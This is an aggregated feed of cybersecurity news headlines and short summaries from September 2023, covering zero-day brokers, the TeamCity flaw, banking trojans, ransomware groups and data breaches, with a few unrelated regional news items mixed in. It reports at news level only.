            The post Russian zero-day broker is willing to pay $20M for zero-day exploits for iPhones and Android devices appeared first on Security Affairs.


Autosummary: Pierluigi Paganini, September 27, 2023. A Russian zero-day broker is willing to pay $20 million for zero-day exploits for iPhones and Android mobile devices.


            5 of the top programming languages for cybersecurity

            ciber
            2023-09-27 https://www.welivesecurity.com/en/secure-coding/5-top-programming-languages-cybersecurity/
While far from all roles in security explicitly demand coding skills, it’s challenging to envision a career in this field that wouldn’t derive substantial advantages from at least a basic understanding of fundamental coding principles.

Autosummary: Conclusion: Obviously there are other programming languages that are widely used in cybersecurity, such as C and C++, Java, Bash, Go, and Ruby, but those will be topics for future blogposts.


            Fraud prevention forces scammers to up their game

            financial
            2023-09-26 https://www.helpnetsecurity.com/2023/09/26/fraud-prevention-aspects-video/

The risk of falling victim to fraud is a constant concern for individuals, businesses, and organizations alike. As technology evolves, so too do the methods employed by fraudsters, making fraud prevention an increasingly critical and complex endeavor. In this Help Net Security round-up, we bring insights from cybersecurity experts who shed light on crucial aspects of fraud prevention. Complete videos: David Fletcher, SVP at ClearSale, discusses how an effective fraud prevention strategy can force fraudsters … More

            The post Fraud prevention forces scammers to up their game appeared first on Help Net Security.




            5 free vulnerability scanners you should check out

            exploits
            2023-09-26 https://www.helpnetsecurity.com/2023/09/26/free-vulnerability-scanners/

            Vulnerability scanners delve into systems to uncover security gaps. The primary mission? To fortify organizations against breaches and shield sensitive data from exposure. Beyond merely pinpointing weaknesses, vulnerability scanning is a proactive measure to anticipate potential attacker entry points. The essence of this process lies not just in detection but in remediation and refining strategies, ensuring that vulnerabilities are prioritized. Here’s a list of 5 free, open-source vulnerability scanners you can try today. Nuclei Nuclei … More

            The post 5 free vulnerability scanners you should check out appeared first on Help Net Security.


Autosummary: Cariddi: Cariddi enables you to take a list of domains, crawl URLs, and scan for endpoints, secrets, API keys, file extensions, tokens, and more.


            MITRE ATT&CK project leader on why the framework remains vital for cybersecurity pros

            ciber
            2023-09-26 https://www.helpnetsecurity.com/2023/09/26/adam-pennington-mitre-attck-framework/

            MITRE ATT&CK, a common language for cybersecurity professionals to communicate with each other and better understand real-world adversary behaviors, celebrates its 10th anniversary this fall. In this Help Net Security interview, project leader Adam Pennington discusses the framework, how defenders can best use it, and what’s next. What were the main drivers behind the creation of the MITRE ATT&CK framework back in 2013? The framework was born out of an internal exercise performed at MITRE’s … More

            The post MITRE ATT&CK project leader on why the framework remains vital for cybersecurity pros appeared first on Help Net Security.


Autosummary: In the last five years, we’ve expanded the core framework with ATT&CK for industrial control systems, mobile, Linux, various cloud platforms (Office 365, Azure, etc.), network devices (computer switches and routers), and more. Additionally, we monitor social media, public reports from various government entities, and updates from incident response firms. In 2018, we amassed enough interest to launch ATT&CKcon (the fourth iteration of the user conference will run Oct. 24-25 at MITRE’s McLean, Va., headquarters).


            Cybersecurity skills employers are desperate to find in 2023

            ciber
            2023-09-26 https://www.helpnetsecurity.com/2023/09/26/sought-after-cybersecurity-skills-2023-video/

The surge in digital economic growth and our increasing dependence on it make cybersecurity a critical profession. In this Help Net Security video, Aaron Rosenmund, Director of Security Research and Curriculum, Pluralsight, discusses the most sought-after cybersecurity skills in today’s competitive labor market.

            The post Cybersecurity skills employers are desperate to find in 2023 appeared first on Help Net Security.




            Critical JetBrains TeamCity Flaw Could Expose Source Code and Build Pipelines to Attackers

            government
            2023-09-26 https://thehackernews.com/2023/09/critical-jetbrains-teamcity-flaw-could.html
A critical security vulnerability in the JetBrains TeamCity continuous integration and continuous deployment (CI/CD) software could be exploited by unauthenticated attackers to achieve remote code execution on affected systems. The flaw, tracked as CVE-2023-42793, carries a CVSS score of 9.8 and has been addressed in TeamCity version 2023.05.4 following responsible disclosure on September 6,



            SickKids impacted by BORN Ontario data breach that hit 3.4 million

            financial
            2023-09-26 https://www.bleepingcomputer.com/news/security/sickkids-impacted-by-born-ontario-data-breach-that-hit-34-million/
The Hospital for Sick Children, more commonly known as SickKids, is among healthcare providers that were impacted by the recent breach at BORN Ontario. The top Canadian pediatric hospital disclosed that as a part of its operations, it shares personal health information with BORN Ontario "related to pregnancy, birth and newborn care." [...]



            ShadowSyndicate hackers linked to multiple ransomware ops, 85 servers

            exploits ransomware
            2023-09-26 https://www.bleepingcomputer.com/news/security/shadowsyndicate-hackers-linked-to-multiple-ransomware-ops-85-servers/
Security researchers have identified infrastructure belonging to a threat actor now tracked as ShadowSyndicate, who likely deployed seven different ransomware families in attacks over the past year. [...]

Autosummary: Group-IB analysts working together with Bridewell and independent researcher Michael Koczwara attribute with various degrees of confidence ShadowSyndicate’s use of the Quantum, Nokoyawa, BlackCat/ALPHV, Clop, Royal, Cactus, and Play ransomware in multiple breaches observed since July 2022.


            Stratascale acquires Vector0 to strengthen its cybersecurity services

            ciber
            2023-09-26 https://www.helpnetsecurity.com/2023/09/26/stratascale-vector0-acquisition/

            Stratascale, an SHI company, announced the acquisition of Vector0, an Attack Surface Management (ASM) provider. Through the acquisition, Stratascale professionals and their customers gain visibility of attack vectors and points of vulnerability, enhancing Stratascale’s ability to deliver proactive cybersecurity services. “Vector0 enables us to offer a comprehensive and proactive approach to Attack Surface Validation (ASV), giving organizations the tools they need to secure their digital initiatives effectively,” said David Olzak, Senior Vice President at Stratascale. … More

            The post Stratascale acquires Vector0 to strengthen its cybersecurity services appeared first on Help Net Security.




            Threat Report: The High Tech Industry Targeted the Most with 46% of NLX-Tagged Attack Traffic

            industry
            2023-09-26 https://thehackernews.com/2023/09/threat-report-high-tech-industry.html
How To Use This Report: enhance situational awareness of techniques used by threat actors; identify potential attacks targeting your industry; gain insights to help improve and accelerate your organization’s threat response. Summary of Findings: The Network Effect Threat Report offers insights based on unique data from Fastly’s Next-Gen WAF from Q2 2023 (April 1, 2023 to June 30, 2023). This report

Autosummary: When analyzing corresponding Autonomous Systems (AS) of NLX IP addresses, Akamai Connected Cloud (formerly Linode) accounted for the largest portion of NLX traffic (16%), followed by Amazon (15%), M247 Europe SRL (9%), DigitalOcean (6%) and Scaleway (5%). Furthermore, nearly one-third (32%) of attacks analyzed in the NLX data were Traversal, while SQL Injection (SQLI) accounted for 28%, Cross Site Scripting (XSS) for 20%, OS Command Injection (CMDEXE) for 13%, and Log4j JNDI lookups (LOG4J-JNDI) for 7%. Before diving deeper into the attack observations, here are five key takeaways that we found most significant in our research, covering global traffic across multiple industries, including High Tech, Financial Services, Commerce, Education, and Media and Entertainment. Out-of-Band (OOB) Callbacks: callback server domains are prevalent throughout NLX data, particularly in Log4j JNDI lookups, OS command injection, and Cross-Site Scripting (XSS) attacks. Observations: during the Reporting Period, more than half (54%) of all attacks observed were tagged with NLX, and the majority of IP addresses in NLX data were not focused on a single customer or industry but spread across multiple targets: 69% of IP addresses targeted multiple customers (Figure 2), and 64% targeted multiple industries.


            Xenomorph malware is back after months of hiatus and expands the list of targets

            exploits
            2023-09-26 https://securityaffairs.com/151443/malware/xenomorph-malware-is-back.html

            A new campaign is spreading Xenomorph malware to Android users in the United States, Spain, Portugal, Italy, Canada, and Belgium. Researchers from ThreatFabric uncovered a new campaign spreading Xenomorph malware to Android users in the United States and all over the world. In February 2022, researchers from ThreatFabric first spotted the Xenomorph malware, which was distributed via the official Google Play […]

            The post Xenomorph malware is back after months of hiatus and expands the list of targets appeared first on Security Affairs.

            "

            Autosummary: The new variant supports a new automated transfer system (ATS) framework and can target over 400 banks and financial institutions mainly from Spain, Turkey, Poland, the United States, Australia, Canada, Italy, Portugal, France, Germany, UAE, and India. By Pierluigi Paganini, September 26, 2023. "


            Smishing Triad Stretches Its Tentacles into the United Arab Emirates

            financial
            2023-09-26 https://securityaffairs.com/151465/cyber-crime/smishing-triad-united-arab-emirates.html

            Resecurity research found that the ‘Smishing Triad’ cybercrime group has expanded its phishing campaign into the United Arab Emirates (UAE). Resecurity research recently found that ‘Smishing Triad,’ a group specializing in phishing scams conducted via SMS (smishing attacks), has expanded its attack campaign into the United Arab Emirates (UAE). First identified by Resecurity in August, […]

            The post Smishing Triad Stretches Its Tentacles into the United Arab Emirates appeared first on Security Affairs.

            "

            Autosummary: First identified by Resecurity in August, the group was initially observed targeting victims in the U.S., UK, Poland, Sweden, Italy, Indonesia, Japan, and other countries. "


            New AtlasCross hackers use American Red Cross as phishing lure

            financial
            2023-09-26 https://www.bleepingcomputer.com/news/security/new-atlascross-hackers-use-american-red-cross-as-phishing-lure/
            A new APT hacking group named "AtlasCross" targets organizations with phishing lures impersonating the American Red Cross to deliver backdoor malware. [...] "

            Autosummary: Moreover, AtlasAgent supports the following commands: obtain computer system information; reverse shell; obtain data from the CnC and store it in the specified file; debugging field; pause the program for a period of time using the Sleep function; obtain process information; inject shellcode into a new thread of the specified process; parameter function (to be implemented). "


            Hackers actively exploiting Openfire flaw to encrypt servers

            exploits
            2023-09-26 https://www.bleepingcomputer.com/news/security/hackers-actively-exploiting-openfire-flaw-to-encrypt-servers/
            Hackers are actively exploiting a high-severity vulnerability in Openfire messaging servers to encrypt servers with ransomware and deploy cryptominers. [...] "

            Autosummary: Although Openfire fixed the issue with versions 4.6.8, 4.7.5, and 4.8.0, released in May 2023, VulnCheck reported that by mid-August 2023, over 3,000 Openfire servers were still running a vulnerable version. "


            Critical JetBrains TeamCity vulnerability could be exploited to launch supply chain attacks (CVE-2023-42793)

            exploits government
            2023-09-26 https://www.helpnetsecurity.com/2023/09/26/cve-2023-42793/

            Software development firm JetBrains has fixed a critical vulnerability (CVE-2023-42793) in its TeamCity continuous integration and continuous delivery (CI/CD) solution, which may allow authenticated attackers to achieve remote code execution and gain control of the server. “As of September 25, 2023, Rapid7 is not aware of in-the-wild exploitation of CVE-2023-42793, and no public exploit code is available,” shared Caitlin Condon, head of vulnerability research at Rapid7. About CVE-2023-42793: CVE-2023-42793 is an authentication bypass vulnerability that … More

            The post Critical JetBrains TeamCity vulnerability could be exploited to launch supply chain attacks (CVE-2023-42793) appeared first on Help Net Security.

            "

            Autosummary: "


            Essential Guide to Cybersecurity Compliance

            ciber
            2023-09-26 https://thehackernews.com/2023/09/essential-guide-to-cybersecurity.html
            SOC 2, ISO, HIPAA, Cyber Essentials – all the security frameworks and certifications today are an acronym soup that can make even a compliance expert’s head spin. If you’re embarking on your compliance journey, read on to discover the differences between standards, which is best for your business, and how vulnerability management can aid compliance. What is cybersecurity compliance? "

            Autosummary: Intruder provides actionable, audit-ready reports, so you can easily show your security posture to auditors, stakeholders and customers. PCI DSS: The PCI DSS (Data Security Standard) was developed by the PCI Security Standards Council and the major card brands (American Express, Mastercard and Visa) to regulate anyone that stores, processes, and/or transmits cardholder data. ISO 27001: ISO produces a set of voluntary standards for a variety of industries – ISO 27001 is the standard for best practice in an ISMS (information security management system) to manage the security of financial information, intellectual property, personnel information, and other third-party information. Security basics like risk assessments, encrypted data storage, vulnerability management and incident response plans are fairly common across standards, but what systems and operations must be secured, and how, are specific to each standard. Compliance doesn't have to mean complexity: Compliance can seem like a labour-intensive and expensive exercise, but it can pale in comparison to the cost of fixing a breach, paying settlements to customers, losing your reputation, or paying fines. SOC 2: SaaS and born-in-the-cloud businesses that provide digital services and systems will be most familiar with SOC 2 as it covers the storage, handling and transmission of digital data, although certification is becoming increasingly popular with all service providers. "


            Xenomorph Banking Trojan: A New Variant Targeting 35+ U.S. Financial Institutions

            financial exploits
            2023-09-26 https://thehackernews.com/2023/09/xenomorph-banking-trojan-new-variant.html
            An updated version of an Android banking trojan called Xenomorph has set its sights on more than 35 financial institutions in the U.S. The campaign, according to Dutch security firm ThreatFabric, leverages phishing web pages that are designed to entice victims into installing malicious Android apps that target a broader list of apps than its predecessors. Some of the other targeted prominent "

            Autosummary: In other words, the ATS framework makes it possible to automatically extract credentials, access account balance information, initiate transactions, obtain MFA tokens from authenticator apps, and perform fund transfers, all without the need for any human intervention. "


            The Rhysida ransomware group hit the Kuwait Ministry of Finance

            financial exploits ransomware
            2023-09-26 https://securityaffairs.com/151501/cyber-crime/rhysida-ransomware-kuwait-ministry-of-finance.html

            This week the Rhysida ransomware group claimed the hack of the Kuwait Ministry of Finance and added it to its Tor leak site. Last week a ransomware attack hit the Government of Kuwait. The attack took place on September 18, and government experts immediately started incident response procedures to block the threat. Below […]

            The post The Rhysida ransomware group hit the Kuwait Ministry of Finance appeared first on Security Affairs.

            "

            Autosummary: Press statement: Update on the ongoing investigations into the limited cyberattack that took place on September 18 and affected one of the Ministry's systems: – None of the data on the salaries of employees of government entities is stored in the Ministry's systems – Working with an international company specialized in combating this type of cybercrime pic.twitter.com/SaK4NGwoYB — Ministry of Finance - Kuwait (@MOFKW) September 25, 2023 This week the Rhysida ransomware group claimed responsibility for the attack and added the ministry to the list of victims on its Tor leak site. "


            BORN Ontario data breach impacted 3.4 million newborns and pregnancy care patients

            financial
            2023-09-26 https://securityaffairs.com/151475/data-breach/born-ontario-data-breach.html

            The Better Outcomes Registry & Network (BORN), the Ontario birth registry disclosed a data breach affecting some 3.4 million people. The Better Outcomes Registry & Network (BORN) is a program and database used in the healthcare sector, particularly in maternal and child health, to collect, manage, and analyze health information for the purpose of improving […]

            The post BORN Ontario data breach impacted 3.4 million newborns and pregnancy care patients appeared first on Security Affairs.

            "

            Autosummary: The exposed data includes: full name, home address, postal code, date of birth, and health card number. Depending on the type of care received by the impacted individuals, the following data may have been exposed: dates of service/care, lab test results, pregnancy risk factors, type of birth, procedures, and pregnancy and birth outcomes. At this time, the organization is not aware of any of the copied data having been misused for any fraudulent purposes. "


            Google assigns new maximum rated CVE to libwebp bug exploited in attacks

            exploits
            2023-09-26 https://www.bleepingcomputer.com/news/security/google-assigns-new-maximum-rated-cve-to-libwebp-bug-exploited-in-attacks/
            Google has assigned a new CVE ID (CVE-2023-5129) to a libwebp security vulnerability exploited as a zero-day in attacks and patched two weeks ago. [...] "

            Autosummary: "


            Exiled Russian journalist claims “European state” hacked her iPhone with Pegasus spyware

            government rusia-ucrania
            2023-09-26 https://www.bitdefender.com/blog/hotforsecurity/exiled-russian-journalist-claims-european-state-hacked-her-iphone-with-pegasus-spyware/
            The founder of a news outlet outlawed in Russia for its independent reporting and stance on the war in Ukraine, believes that a country in the European Union was behind the hacking of her iPhone with military-grade spyware. Read more in my article on the Hot for Security blog. "

            Autosummary: "


            ShadowSyndicate: A New Cybercrime Group Linked to 7 Ransomware Families

            exploits ransomware
            2023-09-26 https://thehackernews.com/2023/09/shadowsyndicate-new-cybercrime-group.html
            Cybersecurity experts have shed light on a new cybercrime group known as ShadowSyndicate (formerly Infra Storm) that may have leveraged as many as seven different ransomware families over the past year. "ShadowSyndicate is a threat actor that works with various ransomware groups and affiliates of ransomware programs," Group-IB and Bridewell said in a new joint report. The actor, active since "

            Autosummary: A majority of the servers (23) are located in Panama, followed by Cyprus (11), Russia (9), Seychelles (8), Costa Rica (7), Czechia (7), Belize (6), Bulgaria (3), Honduras (3), and the Netherlands (3). The actor, active since July 16, 2022, has been linked to ransomware activity related to the Quantum, Nokoyawa, BlackCat, Royal, Cl0p, Cactus, and Play strains, while also deploying off-the-shelf post-exploitation tools like Cobalt Strike and Sliver as well as loaders such as IcedID and Matanbuchus. "


            New ZeroFont phishing tricks Outlook into showing fake AV-scans

            financial
            2023-09-26 https://www.bleepingcomputer.com/news/security/new-zerofont-phishing-tricks-outlook-into-showing-fake-av-scans/
            Hackers are utilizing a new trick of using zero-point fonts in emails to make malicious emails appear as safely scanned by security tools in Microsoft Outlook. [...] "

            Autosummary: "


            Sony investigates cyberattack as hackers fight over who's responsible

            ciber
            2023-09-26 https://www.bleepingcomputer.com/news/security/sony-investigates-cyberattack-as-hackers-fight-over-whos-responsible/
            Sony says that it is investigating allegations of a cyberattack this week as different hackers have stepped up to claim responsibility for the purported hack. Thus far, over 3.14 GB of uncompressed data, allegedly belonging to Sony, has been dumped on hacker forums. [...] "

            Autosummary: The threat actor states that the dump contains "a lot of credentials for internal systems," and files related to: SonarQube, Creators Cloud, Sony's certificates, a device emulator for generating licenses, qasop security, incident response policies, and more. "


            Webinar: Bridging digital transformation & cybersecurity

            ciber
            2023-09-26 https://www.malwarebytes.com/blog/business/2023/09/webinar-bridging-digital-transformation-cybersecurity

            Categories: Business

            How can organizations stay secure amidst the ceaseless tide of change?

            (Read more...)

            The post Webinar: Bridging digital transformation & cybersecurity appeared first on Malwarebytes Labs.

            "

            Autosummary: Meet the Experts: Marcin Kleczynski, CEO of Malwarebytes, teams up with Chris Brock, Drummond's Chief Information Officer. "


            Mexico: Bear gatecrashes picnic leaving onlookers frozen

            latam
            2023-09-26 https://www.bbc.co.uk/news/world-latin-america-66932186?at_medium=RSS&at_campaign=KARANGA
            The animal interrupts lunch, devouring enchiladas and tacos at Chipinque Ecological Park. "

            Autosummary: "


            Current ransomware defenses efforts are not working

            exploits ransomware
            2023-09-25 https://www.helpnetsecurity.com/2023/09/25/infostealer-malware-ransomware/

            Despite some positive developments, the impact of ransomware attacks remains high, according to SpyCloud. Infostealer infections preceded 22% of ransomware events for North American and European ransomware victim companies in 2023 – with common infostealers such as Raccoon, Vidar, and Redline increasing the probability even further. SpyCloud’s analysis shows that 76% of infections that preceded these ransomware events involved Raccoon infostealer malware. Ransomware is a malware problem at its core: Despite shifting priorities to better … More

            The post Current ransomware defenses efforts are not working appeared first on Help Net Security.

            "

            Autosummary: “Ransomware is a malware problem at its core, and there’s a clear pattern emerging that shows infostealer malware is directly leading to ransomware attacks,” said Trevor Hilligoss, Senior Director of Security Research at SpyCloud. "


            Hands-on threat simulations: empower cybersecurity teams to confidently combat threats

            ciber
            2023-09-25 https://www.helpnetsecurity.com/2023/09/25/cybersecurity-teams-skills/

            Security processes are increasingly automated which has led some businesses to deprioritize developing their security teams’ defense skills. While antivirus and non-human generated threat detections efficiently identify vulnerabilities, they cannot detect every single threat. With the rising number of cyber-attacks, organizations must make sure they are ready to defend themselves. That means equipping cybersecurity teams with sufficient skills to identify and effectively stop an attack in its tracks. Worryingly, only 17% of tech workers are … More

            The post Hands-on threat simulations: empower cybersecurity teams to confidently combat threats appeared first on Help Net Security.

            "

            Autosummary: One group poses as the opposing force, or in this case, cyber criminals, while testing the ability of the defenders to detect and protect against such attacks. Hands-on threat simulations will arm cybersecurity experts with the skills and confidence necessary to react to a cyber-attack calmly and efficiently, whilst protecting the company’s sensitive data and avoiding costly damages. This allows them to quickly check the efficacy of their monitoring tools, as well as their people and processes, on an ongoing basis that is accurate to current threats. "


            Balancing cybersecurity with convenience and progress

            ciber
            2023-09-25 https://www.helpnetsecurity.com/2023/09/25/cybersecurity-progress/

            Changing approaches to cybersecurity have led to slow but steady progress in defense and protection. Still, competing interests create a growing challenge for cybersecurity decision makers and practitioners, according to CompTIA. The state of cybersecurity: Most business and technology professionals feel that cybersecurity is improving, both generally and within their organizations. They also acknowledge that the stakes have grown dramatically, with the number of cybercriminals and threats skyrocketing. At the same time, companies are capturing … More

            The post Balancing cybersecurity with convenience and progress appeared first on Help Net Security.

            "

            Autosummary: Threat focus areas for organizations include malware, cited by 40% of U.S. respondents, ransomware (33%), firmware hacking (31%), IoT-based attacks (31%), hardware-based attacks (31%) and phishing (30%). Monitoring network traffic and detecting malware (53%); analyzing user behavior patterns (50%); automating response to cybersecurity incidents (48%); automating configuration of cybersecurity infrastructure (45%). "


            New Report Uncovers Three Distinct Clusters of China-Nexus Attacks on Southeast Asian Government

            government
            2023-09-25 https://thehackernews.com/2023/09/new-report-uncovers-three-distinct.html
            An unnamed Southeast Asian government has been targeted by multiple China-nexus threat actors as part of espionage campaigns targeting the region over extended periods of time. "While this activity occurred around the same time and in some instances even simultaneously on the same victims' machines, each cluster is characterized by distinct tools, modus operandi and infrastructure," Palo Alto "

            Autosummary: The malware eschews the use of shellcode in favor of three DLL-based components to set up persistence on the endpoint, establish command-and-control communications with a remote server, and carry out information-gathering operations, including command execution, file system interaction, keylogging, and screen capture. "


            New variant of BBTok Trojan targets users of +40 banks in LATAM

            financial exploits
            2023-09-25 https://securityaffairs.com/151360/malware/bbtok-trojan-latam.html

            A new variant of a banking trojan, called BBTok, targets users of over 40 banks in Latin America, particularly Brazil and Mexico. Check Point researchers warn of a new variant of a banking trojan, called BBTok, that is targeting users of over 40 banks in Latin America. The new malware campaign relies on new infection chains and […]

            The post New variant of BBTok Trojan targets users of +40 banks in LATAM appeared first on Security Affairs.

            "

            Autosummary: By Pierluigi Paganini, September 25, 2023. "


            Is Gelsemium APT behind a targeted attack in Southeast Asian Government?

            government
            2023-09-25 https://securityaffairs.com/151381/apt/gelsemium-apt-attack-southeast-asian-govt.html

            A stealthy APT group tracked as Gelsemium was observed targeting a Southeast Asian government between 2022 and 2023. Palo Alto Unit42 researchers observed an APT group tracked as Gelsemium targeting a Southeast Asian government. The experts tracked the cluster as CL-STA-0046; the malicious activity spanned over six months between 2022 and 2023. The activity was characterized by the […]

            The post Is Gelsemium APT behind a targeted attack in Southeast Asian Government? appeared first on Security Affairs.

            "

            Autosummary: By Pierluigi Paganini, September 25, 2023. "


            APT and financial attacks on industrial organizations in H1 2023

            financial industry
            2023-09-25 https://ics-cert.kaspersky.com/publications/apt-and-financial-attacks-on-industrial-organizations-in-h1-2023/
            An overview of reports of APT and financial attacks on industrial enterprises, as well as related activities of groups that have been observed attacking industrial organizations and critical infrastructure facilities "

            Autosummary: Volt Typhoon/VANGUARD PANDA attacks: Researchers from Microsoft have reported that a Chinese-speaking threat actor, Volt Typhoon, was able to establish persistent access inside critical infrastructure targets in the US, including the communications, manufacturing, utilities, transportation, construction, maritime, government, information technology, and education sectors. In the most recent campaign, the group targeted organizations in the communications, manufacturing, utilities, transportation, construction, maritime, government, information technology, and education sectors. Winnkit, a credential-dumping tool, a screenshotting tool, a process-hollowing tool, an SQL tool, Mimikatz, ForkPlayground, and proxy configuration tools. Infrastructure associated with the threat actor has been identified in more than 50 countries across North America, South America, Europe, Africa, Asia and Australia, targeting government networks, research facilities, and journalists. The tools used, which include commodity information stealers, RATs (such as AveMaria/Warzone RAT, LodaRAT), Python-based RATs and information stealers, and Python- and Meterpreter-based reverse shells, are delivered via phishing emails containing malicious LNK attachments and decoy PDF documents. Earth Longzhi attacks: After several months of inactivity, Earth Longzhi (believed to be a sub-group of APT41) targeted healthcare, manufacturing, technology and government organizations in Taiwan, Thailand, the Philippines and Fiji. Middle East-related activity. Mint Sandstorm/Charming Kitten attacks: The threat actor Mint Sandstorm (aka Charming Kitten group, previously tracked as Phosphorous), which researchers believe is linked to the Iranian government, is conducting cyberattacks against US critical infrastructure, particularly organizations in the energy and transportation sectors. BlueDelta/Sofacy attacks: According to Recorded Future’s Insikt Group and Ukraine’s Computer Emergency Response Team (CERT-UA), BlueDelta (aka Sofacy, APT28, Fancy Bear and Sednit) exploited vulnerabilities in Roundcube Webmail to hack more than 40 Ukrainian organizations, including government institutions and military entities connected to aviation infrastructure. Other detected malicious activity included listing processes, testing network connectivity, gathering user and group information, mounting shares, enumerating domain trust over WMI, and listing DNS zones over WMI. The attackers use a variety of techniques in these attacks, including password spraying, brute force, token theft, and session replay, to gain unauthorized access to cloud resources. APT attacks with CommonMagic and CloudWizard framework: Kaspersky researchers discovered an ongoing campaign, active since Q3 2021, targeting government, agricultural and transportation organizations in the conflict-affected region of Eastern Europe, using a previously unknown malware set. Compromised organizations operate in various industries, including manufacturing, wealth management, insurance, and pharmaceuticals. "


            Villarrica volcano: Chile raises alert level as activity increases

            latam
            2023-09-25 https://www.bbc.co.uk/news/world-latin-america-66911897?at_medium=RSS&at_campaign=KARANGA
            Villarrica is one of South America's most active volcanoes and last erupted in 2015. "

            Autosummary: "


            Xenomorph Android malware now targets U.S. banks and crypto wallets

            financial exploits
            2023-09-25 https://www.bleepingcomputer.com/news/security/xenomorph-android-malware-now-targets-us-banks-and-crypto-wallets/
            Security researchers discovered a new campaign that distributes a new version of the Xenomorph malware to Android users in the United States, Canada, Spain, Italy, Portugal, and Belgium. [...] "

            Autosummary: Most recently, in March 2023, Hadoken released the third major version of Xenomorph, featuring an automated transfer system (ATS) for autonomous on-device transactions, MFA bypass, cookie stealing, and the ability to target over 400 banks. "


            Ukrainian Military Targeted in Phishing Campaign Leveraging Drone Manuals

            financial
            2023-09-25 https://thehackernews.com/2023/09/ukrainian-military-targeted-in-phishing.html
            Ukrainian military entities are the target of a phishing campaign that leverages drone manuals as lures to deliver a Go-based open-source post-exploitation toolkit called Merlin. "Since drones or Unmanned Aerial Vehicles (UAVs) have been an integral tool used by the Ukrainian military, malware-laced lure files themed as UAVs service manuals have begun to surface," Securonix researchers Den "

            Autosummary: The Windows-based payload is decoded to extract the Merlin Agent, which, in turn, is configured to communicate with a command-and-control (C2) server for post-exploitation actions, effectively seizing control over the host. "


            Alert! Patch your TeamCity instance to avoid server hack

            government
            2023-09-25 https://securityaffairs.com/151399/hacking/teamcity-critical-flaw-cve-2023-42793.html

            Experts warn of a critical vulnerability in the TeamCity CI/CD server that can be exploited to take over a vulnerable server. JetBrains TeamCity is a popular and highly extensible Continuous Integration (CI) and Continuous Delivery (CD) server developed by JetBrains, a software development company known for its developer tools. TeamCity is designed to automate various […]

            The post Alert! Patch your TeamCity instance to avoid server hack appeared first on Security Affairs.

            "

            Autosummary: By Pierluigi Paganini, September 25, 2023. "


            BORN Ontario child registry data breach affects 3.4 million people

            financial
            2023-09-25 https://www.bleepingcomputer.com/news/security/born-ontario-child-registry-data-breach-affects-34-million-people/
            The Better Outcomes Registry & Network (BORN), a healthcare organization funded by the government of Ontario, has announced that it is among the victims of Clop ransomware's MOVEit hacking spree. [...] "

            Autosummary: "


            A phishing campaign targets Ukrainian military entities with drone manual lures

            financial
            2023-09-25 https://securityaffairs.com/151414/cyber-warfare-2/phishing-campaign-targets-ukrainian-military-entities.html

            A phishing campaign targets Ukrainian military entities using drone manuals as lures to deliver the post-exploitation toolkit Merlin. Securonix researchers recently uncovered a phishing campaign using a Pilot-in-Command (PIC) Drone manual document as a lure to deliver a toolkit dubbed Merlin. The campaign, codenamed STARK#VORTEX by Securonix, targets Ukrainian military entities and CERT-UA attributed it […]

            The post A phishing campaign targets Ukrainian military entities with drone manual lures appeared first on Security Affairs.

            "

            Autosummary: By Pierluigi Paganini, September 25, 2023. "


            Ransomware group claims it's "compromised all of Sony systems"

            exploits
            2023-09-25 https://www.malwarebytes.com/blog/news/2023/09/ransomware-group-claims-its-compromised-all-of-sony-systems

            Categories: News

            The ransomware group RansomedVC says it's selling Sony's data.

            (Read more...)

            The post Ransomware group claims it's "compromised all of Sony systems" appeared first on Malwarebytes Labs.

            "

            Autosummary: Sony Group Corporation, formerly Tokyo Telecommunications Engineering Corporation and Sony Corporation, is a Japanese multinational conglomerate corporation headquartered in Minato, Tokyo, Japan. "We have successfully compromissed [sic] all of sony systems." Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Notable victims have included Capcom and Ubisoft in 2020, and CD PROJEKT RED, makers of Cyberpunk 2077 and Witcher 3, in 2021, the same year that FIFA 21 source code was stolen from Electronic Arts. "


            Week in review: 18 free Microsoft Azure cybersecurity resources, K8 vulnerability allows RCE

            exploits ciber
            2023-09-24 https://www.helpnetsecurity.com/2023/09/24/week-in-review-18-free-microsoft-azure-cybersecurity-resources-k8-vulnerability-allows-rce/

            Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: LLM Guard: Open-source toolkit for securing Large Language Models LLM Guard is a toolkit designed to fortify the security of Large Language Models (LLMs). It is designed for easy integration and deployment in production environments. Industrial cybersecurity giant Dragos rakes in new funding, sets sights on global expansion The Dragos Platform is technology built for practitioners by practitioners that arms … More

            The post Week in review: 18 free Microsoft Azure cybersecurity resources, K8 vulnerability allows RCE appeared first on Help Net Security.

            "

            Autosummary: Apple fixes 3 zero-day vulnerabilities exploited to compromise iPhones Apple has released updates for iOS and iPadOS, macOS, watchOS, and Safari to fix three zero-day vulnerabilities (CVE-2023-41992, CVE-2023-41991, CVE-2023-41993) exploited “against versions of iOS before iOS 16.7.” New infosec products of the week: September 22, 2023 Here’s a look at the most interesting products from the past week, featuring releases from 1Password, Dig Security, Laiyer.ai, Viavi Solutions, and Wing Security. "


            National Student Clearinghouse data breach impacted approximately 900 US schools

            financial
            2023-09-24 https://securityaffairs.com/151281/data-breach/national-student-clearinghouse-data-breach.html

            U.S. educational nonprofit organization National Student Clearinghouse disclosed a data breach that impacted approximately 900 US schools. The National Student Clearinghouse (NSC) is a nonprofit organization based in the United States that provides educational verification and reporting services to educational institutions, employers, and other organizations. The organization has disclosed a data breach that impacted approximately […]

            The post National Student Clearinghouse data breach impacted approximately 900 US schools appeared first on Security Affairs.


            Autosummary: The attack took place on May 30 and threat actors gained access to relevant files containing personal information such as name, date of birth, contact information, Social Security number, student ID number, and certain school-related records (for example, enrollment records, degree records, and course-level data).


            Alphv group claims the hack of Clarion, a global manufacturer of audio and video equipment for cars

            industry
            2023-09-24 https://securityaffairs.com/151299/data-breach/alphv-ransomware-hacked-clarion.html

            The Alphv ransomware group claims to have hacked Clarion, the global manufacturer of audio and video equipment for cars and other vehicles. The Alphv ransomware group added Clarion, the global manufacturer of audio and video equipment for cars and other vehicles, to the list of victims on its Tor leak site. Clarion Japan is the Japanese subsidiary […]

            The post Alphv group claims the hack of Clarion, a global manufacturer of audio and video equipment for cars appeared first on Security Affairs.


            Autosummary: The company has more than 10,000 employees and also provides its components to other automakers, including Suzuki, Toyota, Subaru, Ford, Volkswagen, Proton, and Peugeot.


            Huge shelf cloud seen over Brazilian city

            latam government
            2023-09-24 https://www.bbc.co.uk/news/world-latin-america-66904959?at_medium=RSS&at_campaign=KARANGA
            Timelapse video captured the weather phenomenon moving across the sky in Caxias do Sul.



            Apple and Chrome Zero-Days Exploited to Hack Egyptian ex-MP with Predator Spyware

            exploits
